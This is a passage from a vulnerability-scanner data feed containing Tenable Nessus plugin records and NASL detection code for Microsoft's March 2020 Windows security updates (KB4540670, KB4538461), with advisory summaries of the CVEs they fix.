(CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323,\n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4540670/windows-10-update-kb4540670\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f4230aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540670.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540670');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540670])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:29:18", "description": "The remote Windows host is missing security update 4538461.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-0854)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. (CVE-2020-0763)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0879)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811, CVE-2020-0812)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4538461: Windows 10 Version 1809 and Windows Server 2019 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0763", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0807", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0812", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0825", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0854", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4538461.NASL", "href": "https://www.tenable.com/plugins/nessus/134368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134368);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0763\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0807\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0812\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0825\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0854\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4538461\");\n script_xref(name:\"MSFT\", value:\"MS20-4538461\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4538461: Windows 10 Version 1809 and Windows Server 2019 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4538461.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-0854)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n way the Provisioning Runtime validates certain file\n operations. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a victim\n system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, 